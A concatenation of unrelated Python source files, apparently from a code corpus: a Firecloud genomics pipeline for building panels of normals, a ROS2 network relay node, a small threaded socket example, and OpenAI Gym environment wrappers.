num_normals_from_batch = batch_normals.shape[0]
# Cohorts of samples in batch
cohorts_involved = batch_samples['cohort_code'].unique()
# Only select normals from the restricted batches
restricted_normals = all_samples[(all_samples['tsca_id'].isin(batches_to_pick_from)) & (all_samples['sample_type']=="Normal")]
# Merge all normals from cohorts involved
cohorts_normals_lst = []
for cohort_involved in cohorts_involved:
cohort_normals = restricted_normals[(restricted_normals['cohort_code']==cohort_involved)] \
.iloc[:num_normals_per_cohort_involved]
cohorts_normals_lst.append(cohort_normals)
cohorts_normals = pd.concat(cohorts_normals_lst)
# Final PoN: batch normals + normals cohorts involved
final_pon = pd.concat([batch_normals, cohorts_normals])
num_normals = final_pon.shape[0]
final_pon_name = "PoN_%s_%s_batch_normals_%s_normals_per_cohort_%s_total"\
%(tsca_id, num_normals_from_batch, num_normals_per_cohort_involved, num_normals)
# Prepare for FC format
final_pon['membership:sample_set_id'] = final_pon_name
final_pon['sample_id'] = final_pon['entity:sample_id']
final_pon = final_pon[['membership:sample_set_id', 'sample_id']]
return final_pon, final_pon_name
def create_panel_of_normals_from_small_batch(tsca_id, all_samples, num_normals_from_batch = -1, num_normals_per_cohort_involved = 3, num_normals = 25):
"""Create panel of normals with samples from a given small batch.
Small batches are 24-48 samples (instead of the traditional 96).
The main difference is that there are only 2-4 normals per batch, so we must include normals from all the cohorts
involved in this batch.
Args:
- all_samples: with cohort
- N: (int) number of normals from the batch to include in the PoN
- tsca_id: tsca to build PoN for
- num_normals_from_batch: number of normal samples from batch (-1 for all)
- num_normals_per_cohort_involved: number of normal samples from every cohort involved in batch
- num_normals: total number of normals
"""
# Get all samples
batch_samples = all_samples[all_samples['tsca_id']==tsca_id]
# Batch normals
batch_normals = batch_samples[batch_samples['sample_type']=="Normal"].iloc[:num_normals_from_batch]
# Cohorts of samples in batch
cohorts_involved = batch_samples['cohort_code'].unique()
# Merge all normals from cohorts involved
cohorts_normals_lst = []
for cohort_involved in cohorts_involved:
cohort_normals = all_samples[(all_samples['cohort_code']==cohort_involved) & (all_samples['sample_type']=="Normal")] \
.iloc[:num_normals_per_cohort_involved]
cohorts_normals_lst.append(cohort_normals)
cohorts_normals = pd.concat(cohorts_normals_lst)
# Number of normals necessary to complete a total of @num_normals in PoN
num_missing_normals = num_normals - cohorts_normals.shape[0] - batch_normals.shape[0]
# If missing normals, select at random from the rest of the samples
if num_missing_normals > 0:
random_normals = all_samples[all_samples['sample_type']=="Normal"].sample(n=num_missing_normals)
# Final PoN: batch normals + normals cohorts involved + random normals to complete if necessary
final_pon = pd.concat([batch_normals, cohorts_normals, random_normals])
# If num_normals_from_batch is -1, using all normals in batch
if num_normals_from_batch == -1:
num_normals_from_batch = "all"
final_pon_name = "PoN_%s_%s_batch_normals_%s_normals_per_cohort_%s_total"\
%(tsca_id, num_normals_from_batch, num_normals_per_cohort_involved, num_normals)
# Prepare for FC format
final_pon['membership:sample_set_id'] = final_pon_name
final_pon['sample_id'] = final_pon['entity:sample_id']
final_pon = final_pon[['membership:sample_set_id', 'sample_id']]
return final_pon, final_pon_name
def create_panel_of_normals(paths, N, name):
"""Create panel of normals sample set for Firecloud from multiple TSCA batches.
Randomly select N samples from samples present in files listed in paths.
Args:
paths: (list) paths to file ending in {}.import_samples.txt
N: (int) number of samples in panel of normals
name: (string) name of Panel of Normals
"""
dfs = [ pd.read_table(paths[0]) ]
for i, path in enumerate(paths[1:]):
df_to_concat = pd.read_table(path)
dfs.append(df_to_concat)
df = pd.concat(dfs, axis=0)
# Shuffle samples to pick from all batches
df = df.sample(frac=1).reset_index(drop=True)
normals = df[df.sample_type=="Normal"][:N]['sample_id']
if N==-1: print ("Creating panel of %d normals" %normals.shape[0])
else: print ("Creating panel of %d normals" %N)
# Compile data
data = pd.concat([pd.DataFrame(index=normals.index, columns=['membership:sample_set_id'], data=name), \
normals], axis=1)
return data
def upload_pon(pon_df, pon_name, namespace, workspace):
"""Upload PoN to FC
Args:
- pon_df: dataframe with normal samples in PoN
- pon_name: name of PoN
"""
os.system('mkdir -p PoNs')
filename = './PoNs/fc_upload_PoN_%s.txt' % (pon_name)
pon_df.to_csv(filename, '\t', index=False)
res = upload_entities_from_tsv(namespace, workspace, 'PoNs/fc_upload_PoN_%s.txt'%pon_name)
return res
################################################
# Helper Functions
###############################################
def upload_entities_from_tsv(namespace, workspace, entities_tsv_file):
"""Upload entities from tsv file
Args:
Self-explanatory
entities_tsv_file: path to tsv file
Returns:
HTTP Response
"""
res = firecloud_api.upload_entities_tsv(namespace, workspace, entities_tsv=entities_tsv_file)
return res
def delete_pair(namespace, workspace, pair_id):
"""Delete pair from workspace/namespace
"""
body = [{"entityType": "pair", "entityName": pair_id}]
res = firecloud_api.delete_entities(namespace, workspace, body)
return res
def delete_pair_set(namespace, workspace, pair_set_id):
"""Delete pair set from workspace/namespace
Args:
Self-explanatory
Returns:
HTTP Response
"""
body = [{"entityType": "pair_set", "entityName": pair_set_id}]
res = firecloud_api.delete_entities(namespace, workspace, body)
return res
def delete_sample(namespace, workspace, sample_id):
"""Delete sample from workspace/namespace
Args:
Self-explanatory
Returns:
HTTP Response
"""
body = [{"entityType": "sample", "entityName": sample_id}]
res = firecloud_api.delete_entities(namespace, workspace, body)
return res
def delete_sample_set(namespace, workspace, sample_set_id):
"""Delete sample set from workspace/namespace
Args:
Self-explanatory
Returns:
HTTP Response
"""
body = [{"entityType": "sample_set", "entityName": sample_set_id}]
res = firecloud_api.delete_entities(namespace, workspace, body)
return res
def delete_participant(namespace, workspace, participant_id):
"""Delete participant from workspace/namespace
Args:
Self-explanatory
Returns:
HTTP Response
"""
body = [{"entityType": "participant", "entityName": participant_id}]
res = firecloud_api.delete_entities(namespace, workspace, body)
return res
def download_remote_samples(namespace, workspace):
"""Download remote samples from Firecloud
Writes:
- remote_samples.txt: samples in FC
"""
res = firecloud_api.get_entities_tsv(namespace, workspace, "sample")
with open('remote_files/remote_samples.txt', 'w') as outfile:
outfile.write(res.text)
return
def merge_walkupseq_files(latest_tsca_id):
"""Merge all walkupseq files in the walkupseq directory
These files have metadata (primary disease, media type) to add to sample metadata
"""
paths = glob.glob('walkupseq_files/*sample_info*')
dfs = []
for f in paths:
tmp = pd.read_table(f, encoding='latin1')
dfs.append(tmp)
df = pd.concat(dfs, axis=0)
df.to_csv('walkupseq_files/walkupseq_all_combined_%s.txt'%latest_tsca_id, sep="\t", index=None)
return df
def remove_blacklisted_samples(all_samples):
"""Remove blacklisted samples
"""
# Blacklisted samples
blacklisted = pd.read_table("samples_blacklist.txt", header=None, names=["entity:sample_id"])
blacklisted_sample_ids = blacklisted["entity:sample_id"].values.tolist()
all_samples = all_samples[~all_samples["entity:sample_id"].isin(blacklisted_sample_ids)]
return all_samples
################################################
### MAIN
###############################################
################################# TODO: #####################################
# UPDATE REMOTE FILES WITH TSCA JUST RUN AFTER THE FIRST TIME BOTH PROGRAMS HAVE SUCCEEDED
# (upload_data_new_batch and update_cohorts)
#############################################################################
# Based on results from commands (r4*, r5, r6)
# For example, if running TSCA 23, tsca_id = "TSCA23" and latest_tsca_id = "TSCA22".
# Run upload_data_new_batch
def upload_data_new_batch(tsca_id, latest_tsca_id, paths_to_batches_info, namespace, workspace, google_bucket_id):
"""
Upload data for new batch.
This function only needs to be called once for a new batch.
Only run once, otherwise you will create duplicate samples in the sample sets
Args:
- tsca_id: id of TSCA for which data is to be uploaded
- latest_tsca_id: id of latest TSCA available
- paths_to_batches_info: file with paths to .import_samples.txt files (paths_to_batches_info.xlsx)
- Rest are self-explanatory
"""
paths_to_batches_info_df = pd.read_excel(paths_to_batches_info, index_col=0)
path_to_samples_info = paths_to_batches_info_df.loc[tsca_id, 'path_to_samples_info']
# DF of remote [sample < > sample set ]
remote_sample_sets = pd.read_table('remote_files/sample_set_membership_%s.tsv'%latest_tsca_id)
# DF of remote [pair < > pair set]
remote_pair_sets = pd.read_table('remote_files/pair_set_membership_%s.tsv'%latest_tsca_id)
all_samples = get_samples(paths_to_batches_info, google_bucket_id)
# Add cohorts for older batches
all_samples = add_cohort_to_old_batches(all_samples)
##### Remove blacklisted samples ##
# Blacklisted samples
blacklisted = pd.read_table("samples_blacklist.txt", header=None, names=["entity:sample_id"])
blacklisted_sample_ids = blacklisted["entity:sample_id"].values.tolist()
all_samples = all_samples[~all_samples["entity:sample_id"].isin(blacklisted_sample_ids)]
########## Participants ##########
print("Uploading participants...")
participants = prepare_participants_for_metadata_export(path_to_samples_info, tsca_id)
r1 = save_and_upload_participants(participants, namespace, workspace, tsca_id)
##################################
########## Samples ############
print("Uploading samples...")
batch_samples = prepare_batch_samples_for_metadata_export(path_to_samples_info, tsca_id, google_bucket_id)
r2 = save_and_upload_samples(batch_samples, namespace, workspace, tsca_id)
#################################
########## Pairs #############
print("Uploading pairs...")
pairs = create_pairs_list(all_samples)
r3 = save_and_upload_pairs(namespace, workspace, pairs)
#################################
########## Sample Sets #########
print("Uploading sample sets...")
batch_sample_set, batch_tumor_set, batch_normal_set = prepare_batch_sample_set_for_metadata_export(path_to_samples_info, tsca_id)
# Remove the samples that have already been uploaded
uploaded_sample_ids = remote_sample_sets['sample'].tolist()
batch_sample_set_clean = batch_sample_set[~batch_sample_set['sample_id'].isin(uploaded_sample_ids)]
batch_tumor_set_clean = batch_tumor_set[~batch_tumor_set['sample_id'].isin(uploaded_sample_ids)]
batch_normal_set_clean = batch_normal_set[~batch_normal_set['sample_id'].isin(uploaded_sample_ids)]
r4a, r4b, r4c = save_and_upload_batch_sample_sets(batch_sample_set_clean, batch_tumor_set_clean, batch_normal_set_clean, tsca_id, namespace, workspace)
#################################
########## PoNs ###############
print("Uploading PoNs...")
# Number of latest tsca id
latest_tsca_id_int = int(re.findall('\d+', latest_tsca_id )[0])
# Array with list of all previous TSCA ids
previous_tsca_ids = ["TSCA%s"%i for i in np.arange(14, latest_tsca_id_int+1)]
previous_tsca_ids.insert(0, "TSCA1213")
pon, name = create_panel_of_normals_advanced(tsca_id, all_samples,\
num_normals_per_cohort_involved = 3, \
batches_to_pick_from = previous_tsca_ids)
# Only upload PoN if it hasn't been uploaded already
if not name in remote_sample_sets['membership:sample_set_id'].unique().tolist():
r5 = upload_pon(pon, name, namespace, workspace)
else:
print("PoN already exists...")
r5 = {}
#################################
########## Pair Set ###########
print("Uploading pair sets...")
# Upload cumulative pair sets
tn_cum_pairsets, tp_cum_pairsets = prepare_cumulative_pairsets_for_metadata_export(pairs, tsca_id)
r6 = upload_pairsets(namespace, workspace, tn_cum_pairsets, "TN")
r7 = upload_pairsets(namespace, workspace, tp_cum_pairsets, "TP")
# Batch pair sets
tn_pairsets, tp_pairsets = prepare_batch_pairsets_for_metadata_export(all_samples, pairs, tsca_id)
uploaded_pair_ids = remote_pair_sets['pair'].tolist()
tn_pairsets_clean = tn_pairsets[~tn_pairsets['pair_id'].isin(uploaded_pair_ids)]
tp_pairsets_clean = tp_pairsets[~tp_pairsets['pair_id'].isin(uploaded_pair_ids)]
r8 = upload_pairsets(namespace, workspace, tn_pairsets_clean, "TN")
r9 = upload_pairsets(namespace, workspace, tp_pairsets_clean, "TP")
#################################
return (r1, r2, r3, r4a, r4b, r4c, r5, r6, r7, r8, r9)
def update_cohorts(tsca_id, latest_tsca_id, paths_to_batches_info, namespace, workspace, google_bucket_id):
"""
Update cohorts (sample sets that span multiple batches)
This function needs to be called once for a new batch. Before updating a cohort sample set, it removes samples that
already belong to that cohort remotely, because if we don't they will be duplicated.
Args:
- latest_tsca_id: id of latest TSCA available
- paths_to_batches_info: file with paths to .import_samples.txt files (paths_to_batches_info.xlsx)
- Rest are self-explanatory
"""
# Pre-requisites
all_samples = get_samples(paths_to_batches_info, google_bucket_id)
# Add cohorts for older batches
all_samples = add_cohort_to_old_batches(all_samples)
# Remove blacklisted samples
all_samples = remove_blacklisted_samples(all_samples)
pairs = create_pairs_list(all_samples)
# DF of remote samples
remote_samples = pd.read_table('remote_files/remote_samples_%s.txt'%latest_tsca_id)
# DF of remote [sample < > sample set ]
remote_sample_sets = pd.read_table('remote_files/sample_set_membership_%s.tsv'%latest_tsca_id)
# DF of remote [pair < > pair set]
remote_pair_sets = pd.read_table('remote_files/pair_set_membership_%s.tsv'%latest_tsca_id)
#### UPDATE COHORT SAMPLE SETS
# DF of [samples < > sample set] to be updated
cohorts = prepare_cohorts_for_metadata_export(all_samples)
# Remove the samples that already belong to the cohort in FC
sample_ids_in_cohort = remote_sample_sets['sample'].tolist()
cohorts_clean = cohorts[~cohorts['sample_id'].isin(sample_ids_in_cohort)]
r1 = save_and_upload_cohorts(cohorts_clean, latest_tsca_id, namespace, workspace)
#### UPDATE COHORT PAIR SETS
# Retrieve cohort pairsets
cohort_pairsets = prepare_cohort_pairsets_for_metadata_exports(latest_tsca_id, pairs, all_samples, blacklist=[])
# Remove the pairs that already belong to the cohort in FC
pair_ids_in_cohort = remote_pair_sets['pair'].tolist()
cohort_pairsets_clean = cohort_pairsets[~cohort_pairsets['pair_id'].isin(pair_ids_in_cohort)]
r2 = save_and_upload_cohort_pairsets(namespace, workspace, cohort_pairsets_clean)
# Remove samples that already exist in FC
# remote_sample_ids = remote_samples['entity:sample_id'].tolist()
# all_samples_clean = all_samples[~all_samples['entity:sample_id'].isin(remote_sample_ids)]
r3 = save_and_upload_cohort_all_samples(all_samples, "Cum_%s_all"%tsca_id, namespace, workspace, blacklist=[])
r4 = save_and_upload_cohort_all_tumors(all_samples, "Cum_Tumors_%s_all"%tsca_id, namespace, workspace, blacklist=[])
### Create cumulative PoN (all batches)
pon_name = 'Cum_PoN_%s_all'%tsca_id
paths_to_batches_info_df = pd.read_excel(paths_to_batches_info, index_col=0)
cumulative_pon = create_panel_of_normals(paths_to_batches_info_df.path_to_samples_info.tolist(), -1, pon_name)
r5 = upload_pon(cumulative_pon, pon_name, namespace, workspace)
return (r1, r2, r3, r4, r5)
|
991,489 | 694ef27a90b8fc515517608104e6c1e23e416bb6 | x = lambda a, b: a + 1 + b
print(x(2, 3)) |
991,490 | 921e2072d270a66b5d0da39a40ed00ba3be53856 | import rclpy
from rclpy.node import Node
from contextlib import contextmanager
from functools import partial, total_ordering
from importlib import import_module
import queue
import socket
from typing import Any
import threading
import traceback
import time
from ros2relay.message_socket.message_socket import MessageSocket, SocketMessage, MessageType
from ros2relay.metrics.metrics import MessageMetricsHandler
# class obtained from combination of https://stackoverflow.com/a/16782490/4089216 and https://stackoverflow.com/a/16782391/4089216
class TimeoutLock(object):
def __init__(self):
self._lock = threading.Lock()
@contextmanager
def acquire_timeout(self, timeout):
result = self._lock.acquire(timeout=timeout)
yield result
if result:
self._lock.release()
# class obtained from https://stackoverflow.com/a/54028394/4089216
@total_ordering
class PrioritizedItem:
def __init__(self, priority, item):
self.priority = priority
self.item = item
def __eq__(self, other):
if not isinstance(other, __class__):
return NotImplemented
return self.priority == other.priority
def __lt__(self, other):
if not isinstance(other, __class__):
return NotImplemented
return self.priority < other.priority
class NetworkPublisher(Node):
""" ros2relay NetworkPublisher subscribes to a set of topics on the local system and publishes them to the network
Requires that a NetworkSubscriber be running on the target endpoint
"""
# priority of the topic, where a lower value indicates a higher priority
topic_priorities = {}
topic_sample_rates = {}
# how many packets we've observed on a topic. The format is
# [{topic:numSampled}]
# where each index is a worker id
worker_sample_counts = []
sampling = True
# keep reference to subscriptions
my_subscriptions = {}
# each worker thread will have a socket, each worker_id is between 0 and worker_count - 1
# each workers socket belongs at sockets[worker_id]
sockets = []
# locks only used for reconnect on tcp
socket_locks = []
# maintain workers to join later
workers = []
# need to do some testing with 1000 as max value for priority queue
message_queue = queue.PriorityQueue(1000)
def __init__(self):
super().__init__('ros2relay_net_publisher')
self._declare_parameters()
self._set_local_params()
for idx, tType in enumerate(self.topic_types):
module_parts = tType.split('.')
module_name = module_parts[0] + '.' + module_parts[1]
module = import_module(module_name)
msg = getattr(module, module_parts[2])
self.topic_priorities[self.topics[idx]] = self.topic_priority_list[idx]
func = partial(self.listener_callback, self.topics[idx])
if self.sampling:
self.topic_sample_rates[self.topics[idx]] = self.sample_rates[idx]
self.my_subscriptions[self.topics[idx]] = self.create_subscription(
msg,
self.topics[idx],
func,
10
)
samplingMessage = str(self.sample_rates[idx]) if self.sampling else 'Disabled'
self.get_logger().info(f'Initializing topic "{self.topics[idx]}" : {tType} - sample rate : {samplingMessage}')
self.running = True
for i in range(0, self.worker_count):
if self.sampling:
self.worker_sample_counts.append({})
for topic in self.topics:
self.worker_sample_counts[i][topic] = self.topic_sample_rates[topic]
self.socket_locks.append(TimeoutLock())
self.init_socket_with_rety(i)
# as worker threads can access the socket list, initialize workers in separate loop after initial sockets
# to keep concurrence. Each worker thread only accesses its own position in the array once initialized
for i in range(0, self.worker_count):
self.workers.append(threading.Thread(target=self.work, args=((i,))))
self.workers[i].start()
self.get_logger().info(f"{self.worker_count} workers started. Sending to {self.host}:{self.port} mode = {self.mode}")
self.metric_handler = MessageMetricsHandler(num_handlers=self.worker_count, count_drops=True)
timer_period = 1 # seconds
self.metric_publisher = self.create_timer(timer_period, self.metric_handler.publish_metrics)
def _set_local_params(self):
self.topics = self.get_parameter('topics').get_parameter_value().string_array_value
self.topic_types = self.get_parameter('topicTypes').get_parameter_value().string_array_value
self.mode = self.get_parameter('mode').get_parameter_value().string_value
self.host = self.get_parameter('server').get_parameter_value().string_value
self.port = self.get_parameter('port').get_parameter_value().integer_value
self.topic_priority_list = self.get_parameter('topicPriorities').get_parameter_value().integer_array_value
sampleRateParam = self.get_parameter('sampleRates').get_parameter_value()
self.sample_rates = None
required_params = [
('topics', self.topics),
('topicTypes', self.topic_types),
('mode', self.mode),
('host', self.host),
('port', self.port)]
for (paramName, param) in required_params:
if ((isinstance(param, list) or isinstance(param, str)) and len(param) == 0) or param == 0:
raise ValueError(f"{paramName} is a required parameter and was not set")
if not self.topic_priority_list:
self.topic_priority_list = [0 for topic in self.topics]
if len(self.topics) != len(self.topic_types):
raise ValueError("topic and topicTypes parameters should be equal in size." +
f"topic size: {len(self.topics)}, topicTypes size: {len(self.topic_types)}")
if len(sampleRateParam.integer_array_value) != 0:
if len(sampleRateParam.integer_array_value) != len(self.topics):
raise ValueError('if sampleRates parameter is set as array, length of array must be equal to number of topics')
self.sample_rates = sampleRateParam.integer_array_value
if self.sample_rates is None and sampleRateParam.integer_value != 0:
# same sample rate for each topic
self.sample_rates = [sampleRateParam.integer_value for topic in self.topics]
if self.sample_rates is None:
self.get_logger().info('sample rates was not set, sending all topics data')
self.sampling = False
# if tcp, this value should be less than or equal to the number of clients the net_subscriber can handle
self.worker_count = self.get_parameter('numWorkers').get_parameter_value().integer_value
def _declare_parameters(self):
self.declare_parameter('server')
self.declare_parameter('port')
self.declare_parameter('topics')
self.declare_parameter('topicTypes')
self.declare_parameter('topicPriorities')
self.declare_parameter('mode', 'tcp')
self.declare_parameter('numWorkers')
self.declare_parameter('sampleRates')
def init_socket_with_rety(self, worker_id):
""" attempts to initialize the socket with retries for the worker_id. retries is only attempted for tcp connections """
if self.mode == "tcp":
# acquire lock for this socket in 100 ms or abandon, another thread is handling the socket reconnect
with self.socket_locks[worker_id].acquire_timeout(0.1):
connected = False
while not connected:
try:
self._init_socket_tcp(worker_id)
connected = True
self.get_logger().info('Connection successful!')
except Exception as e:
self.get_logger().error(f"Error initializing socket exception: {str(e)} worker id {worker_id}")
for i in range(1, 5):
self.get_logger().info(f'Retrying in {5-i}')
time.sleep(1)
elif self.mode == "udp":
self._init_socket_udp(worker_id)
else:
raise Exception("Mode must be one of 'udp' or 'tcp'")
def _init_socket_tcp(self, worker_id):
"""
initializes a tcp socket. If the socket was already initialized then it attempts to close the socket before assigning it to our
active sockets
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
if len(self.sockets) - 1 < worker_id:
self.sockets.append(MessageSocket(sock))
else:
# socket was already initialized, MessageSocket implements a try:catch
self.sockets[worker_id].close()
self.sockets[worker_id] = MessageSocket(sock)
def _init_socket_udp(self, worker_id):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if len(self.sockets) - 1 < worker_id:
self.sockets.append(MessageSocket(sock, (self.host, self.port)))
else:
# socket was already initialized, MessageSocket implements a try:catch
self.sockets[worker_id].close()
self.sockets[worker_id] = MessageSocket(sock, (self.host, self.port))
def work(self, worker_id):
"""
work thread, retrieve items from the priority queue and send the message
"""
try:
while self.running:
# blocking request - timeout 3 seconds
messageSent = False
try:
# throws queue.Empty exception if it fails to get an item in 3 seconds
priorityItem = self.message_queue.get(True, 3)
topic = priorityItem.item.topic
self.metric_handler.increment_observed()
print(f"sending message on topic {topic} approximate queue size: {self.message_queue.qsize()}")
if self.sampling == True:
if self.worker_sample_counts[worker_id][topic] == self.topic_sample_rates[topic]:
self.send_message(priorityItem.item, worker_id)
self.worker_sample_counts[worker_id][topic] = 0
else:
self.worker_sample_counts[worker_id][topic] += 1
else:
self.send_message(priorityItem.item, worker_id)
# might not have actually been sent if we are sampling, but dont attempt to send it in finally
messageSent = True
except (ConnectionResetError, BrokenPipeError, ConnectionResetError) as e:
# should maybe record number of times connection breaks? Will get wordy
self.get_logger().error(f"Error sending socket message: {str(e)}")
self.init_socket_with_rety(worker_id)
except queue.Empty:
priorityItem = None
pass
finally:
# give one more attempt at sending the message if we failed
if not messageSent and priorityItem is not None:
try:
self.send_message(priorityItem.item, worker_id)
except:
pass
except Exception as ex:
self.get_logger().error(f"Worker thread {worker_id} exitting unexpectedly with error: {str(ex)}")
self.get_logger().error(traceback.format_exc())
finally:
self.get_logger().info(f"Worker thread {worker_id} finishing.")
def listener_callback(self, topic, msg):
"""
attempts to send the message to the remote server
if this fails - it will try to re-initialize the socket. The message will attempt
a single retry on the message, otherwise it will be lost and all subsequent
messsages until the connection is re-established
"""
netMessage = SocketMessage(mType=MessageType.MESSAGE, mTopic=topic, mPayload=msg)
item = PrioritizedItem(priority=self.topic_priorities[topic], item=netMessage)
try:
self.message_queue.put_nowait(item)
except queue.Full as ex:
## TODO handle queue full issue - shouldn't hit this too often, we either need more workers or too much data is being sent
# self.get_logger().error(f'Queue is full! {str(ex)}')
self.metric_handler.increment_dropped()
except Exception as ex:
# some other error
self.get_logger().error(f'Error queuing message {str(ex)}')
def send_message(self, message, worker_id):
if self.mode != 'tcp' and self.mode != 'udp':
raise Exception(f'Mode is set to {self.mode}. Accepted modes are "udp" or "tcp"')
if self.mode == 'tcp':
bytesSent, time_taken = self.sockets[worker_id].send_message(message)
elif self.mode == 'udp':
bytesSent, time_taken = self.sockets[worker_id].sendto(message)
if bytesSent and bytesSent > 0:
self.metric_handler.handle_message(worker_id, bytesSent, time_taken)
# time_taken in seconds floating point
def shutdown(self):
self.running = False
for i in range(0, self.worker_count):
try:
self.sockets[i].close()
except Exception as ex:
self.get_logger().warning(f"Exception closing down worker socket {i}, exception: {str(ex)}")
for i in range(0, self.worker_count):
self.get_logger().info(f"Joining worker thread {i}")
# 5 second wait before skipping thred
self.workers[i].join(5)
def main(args=None):
rclpy.init(args=args)
network_publisher = NetworkPublisher()
try:
rclpy.spin(network_publisher)
network_publisher.shutdown()
network_publisher.destroy_node()
rclpy.shutdown()
except Exception as ex:
traceback.print_exc()
print("!! SIGINT received - attempting to clean up remaining threads...please wait...")
network_publisher.shutdown()
network_publisher.destroy_node()
if __name__ == '__main__':
main()
|
991,491 | 2d570b9ad381032d32b0f2afa7957d1c604bb054 | import threading
import time
class myThread(threading.Thread):
def __init__(self,s,name):
threading.Thread.__init__(self)
self.s=s
self.name=name
def run(self):
c, addr = self.s.accept()
while (True):
try:
msg = "server data"
data = pickle.dumps(msg)
c.send(data)
msg = pickle.loads(c.recv(1024))
print(msg)
except Exception as e:
print(e)
def handle_client(str):
count=0
while True:
print(str)
t=myThread("kp","client2")
t.start()
t=myThread("kp","client3")
t.start()
t=myThread("kp","client1")
t.start() |
991,492 | 7d2865faaf0d041cefae0b4b141871652de43dfc | """
https://github.com/openai/gym/wiki/Table-of-environments
https://github.com/openai/gym/tree/master/gym/envs -
check gym/gym/envs/__init__.py for solved properties (max_episode_steps, reward_threshold, optimum).
Solved: avg_score >= reward_threshold, over 100 consecutive trials.
"Unsolved environment" - doesn't have a specified reward_threshold at which it's considered solved.
Environments:
Classic Control - CartPole, Pendulum, MountainCarContinuous. # TODO: Acrobot.
Box2D - LunarLander, LunarLanderContinuous, BipedalWalker.
Atari - Breakout, SpaceInvaders.
####################################
Atari environments:
Atari environments must be trained on a GPU (will basically take thousands of years on CPU).
observation's shape: (210, 160, 3) # (H, W, C)
screen_size = (210, 160) # (H, W)
image_channels = 3 # RGB
observation pre-process # reshaping (usually)
1. the atari screen should be truncated (cropped) - since there's no need for the score, etc...
2. remove color by getting the mean of the 3 channels (axis=2 means along the RGB values)
input_type = INPUT_TYPE_STACKED_FRAMES
"""
import numpy as np
import gym
from reinforcement_learning.deep_RL.const import INPUT_TYPE_OBSERVATION_VECTOR, INPUT_TYPE_STACKED_FRAMES, \
ATARI_FRAMES_STACK_SIZE, ATARI_IMAGE_CHANNELS_GRAYSCALE
from reinforcement_learning.utils.utils import normalize
class BaseEnv:
@staticmethod
def get_state(observation, prev_s):
return observation
@staticmethod
def update_reward(reward, done, info):
return reward
# ClassicControl:
class CartPole(BaseEnv):
"""
AKA "Inverted Pendulum".
A pole is attached by an un-actuated joint to a cart, which moves along a frictionless track.
The system is controlled by applying a force of +1 or -1 to the cart.
Goal: to prevent the pendulum from falling over.
Starting State: the pendulum starts upright.
Episode Termination (besides reaching the goal):
the pole is more than 15 degrees from vertical.
the cart moves more than 2.4 units from the center.
Rewards: +1 for every time-step that the pole remains upright.
Solved:
gym/gym/envs/__init__.py :
CartPole-v0: max_episode_steps = 200, reward_threshold = 195.0
CartPole-v1: max_episode_steps = 500, reward_threshold = 475.0
Continuous observation space (4D).
O = ndarray[x, x_dot, theta, theta_dot]
x - Cart Position [-2.4, 2.4]
x_dot - Cart Velocity [-Inf, Inf]
theta - Pole Angle [~-41.8°, ~41.8°]
theta_dot - Pole Velocity [-Inf, Inf]
Discrete action space (1D).
Actions (2): left (0), right (1)
cart_pole_policy = lambda theta_state: 0 if theta_state < (pole_theta_bin_num // 2) else 1
"""
def __init__(self):
self.name = 'Cart Pole'
self.file_name = 'cart-pole-v1'
self.env = gym.make('CartPole-v1')
self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
self.input_dims = [4] # Box(4,)
self.is_discrete_action_space = True
self.n_actions = 2 # Discrete(2)
self.action_space = [i for i in range(self.n_actions)]
self.GAMMA = 0.99
self.EPS_MIN = None
self.memory_size = 1000000
self.memory_batch_size = 64
class Pendulum(BaseEnv):
"""
Solved:
gym/gym/envs/__init__.py :
Pendulum-v0: max_episode_steps = 200
InvertedPendulum-v2: max_episode_steps = 1000, reward_threshold = 950.0
InvertedDoublePendulum-v2: max_episode_steps = 1000, reward_threshold = 9100.0
Continuous observation space (3D).
Continuous action space (1D).
"""
def __init__(self):
self.name = 'Pendulum'
self.file_name = 'pendulum-v0'
self.env = gym.make('Pendulum-v0')
self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
self.input_dims = [3] # Box(3,)
self.is_discrete_action_space = False
self.n_actions = 1 # Box(1,)
self.action_boundary = 2
self.GAMMA = 0.99
self.EPS_MIN = None
self.memory_size = 1000000
self.memory_batch_size = 64
class MountainCarContinuous(BaseEnv):
"""
Solved:
gym/gym/envs/__init__.py :
MountainCarContinuous-v0: max_episode_steps = 999, reward_threshold = 90.0
Continuous observation space (2D).
Continuous action space (1D).
"""
def __init__(self):
self.name = 'Mountain Car Continuous'
self.file_name = 'mountain-car-continuous-v0'
self.env = gym.make('MountainCarContinuous-v0')
self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
self.input_dims = [2] # Box(2,)
self.is_discrete_action_space = False
self.n_actions = 1 # Box(1,)
self.action_boundary = 1
self.GAMMA = 0.99
self.EPS_MIN = None
self.memory_size = 1000000
self.memory_batch_size = 64
# Box2D:
class LunarLander(BaseEnv):
"""
Solved:
gym/gym/envs/__init__.py :
LunarLander-v2: max_episode_steps = 1000, reward_threshold = 200
Continuous observation space (8D).
Discrete action space (1D).
Actions (4)
"""
def __init__(self):
self.name = 'Lunar Lander'
self.file_name = 'lunar-lander-v2'
self.env = gym.make('LunarLander-v2')
self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
self.input_dims = [8] # Box(8,)
self.is_discrete_action_space = True
self.n_actions = 4 # Discrete(4)
self.action_space = [i for i in range(self.n_actions)]
self.GAMMA = 0.99
self.EPS_MIN = None
self.memory_size = 1000000
self.memory_batch_size = 64
class LunarLanderContinuous(BaseEnv):
"""
Solved:
gym/gym/envs/__init__.py :
LunarLanderContinuous-v2: max_episode_steps = 1000, reward_threshold = 200
Continuous observation space (8D).
Continuous action space (2D).
"""
def __init__(self):
self.name = 'Lunar Lander Continuous'
self.file_name = 'lunar-lander-continuous-v2'
self.env = gym.make('LunarLanderContinuous-v2')
self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
self.input_dims = [8] # Box(8,)
self.is_discrete_action_space = False
self.n_actions = 2 # Box(2,)
self.action_boundary = [1, 1]
self.GAMMA = 0.99
self.EPS_MIN = None
self.memory_size = 1000000
self.memory_batch_size = 64
class BipedalWalker(BaseEnv):
"""
Solved:
gym/gym/envs/__init__.py :
BipedalWalker-v3: max_episode_steps = 1600, reward_threshold = 300
BipedalWalkerHardcore-v3: max_episode_steps = 2000, reward_threshold = 300
Continuous observation space (24D).
State vector consists of:
hull angle speed
angular velocity
horizontal speed
vertical speed
position of joints
joints angular speed
legs contact with ground
10 lidar rangefinder measurements
There are no coordinates in the state vector.
Continuous action space (4D).
